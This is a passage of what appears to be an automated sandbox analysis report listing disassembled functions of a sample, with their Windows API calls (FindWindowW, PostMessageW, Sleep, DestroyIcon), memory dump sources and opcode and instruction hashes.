                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 6b780f0e85cacf89d66ad282b5f9dfb16baa4b19c1f1679dd43a9f5d05da26dd
                            • Instruction ID: c8577953ffe05df0e80ca7f647b5a8fc51881e677568451987320b6493065f77
                            • Opcode Fuzzy Hash: 6b780f0e85cacf89d66ad282b5f9dfb16baa4b19c1f1679dd43a9f5d05da26dd
                            • Instruction Fuzzy Hash: DED012357C4311B7E664BB70AC0FFD76A14BF01B54F11083AB349AA5D1D9F49804CA6C
                            Function 00445998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32 ref: 004459AE
                            • PostMessageW.USER32 ref: 004459B5
                              • Part of subcall function 00425244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 35fc4d136f639e855bc8b5a772a7330f4f49b52f6ac63daf3e1cf5b857e74514
                            • Instruction ID: 864adeda022d170ec8ad9acce8f57a3c8d78daf9802d060bf959e77faf1c374c
                            • Opcode Fuzzy Hash: 35fc4d136f639e855bc8b5a772a7330f4f49b52f6ac63daf3e1cf5b857e74514
                            • Instruction Fuzzy Hash: B9D0C9357C0311BAE664AB70AC0FFD66614AB05B54F11083AB249AA5D1D9F4A804CA6C
                            Function 003C363C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyIcon.USER32(00010357), ref: 003C3646
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: DestroyIcon
                            • String ID: xH$RH
                            • API String ID: 1234817797-1196700554
                            • Opcode ID: b5ce4740b321ad979f01f5bdf268b21a6948dd206c56040bd737aabc759ea443
                            • Instruction ID: 8779d1ae92f0d79eb85880e3c7351e5c4390bf6be02b7bb341d123e60965e5a0
                            • Opcode Fuzzy Hash: b5ce4740b321ad979f01f5bdf268b21a6948dd206c56040bd737aabc759ea443
                            • Instruction Fuzzy Hash: C5C01265700E4493C615B7645414E3E255996C53103008CFE6956CE292CF389C408B1D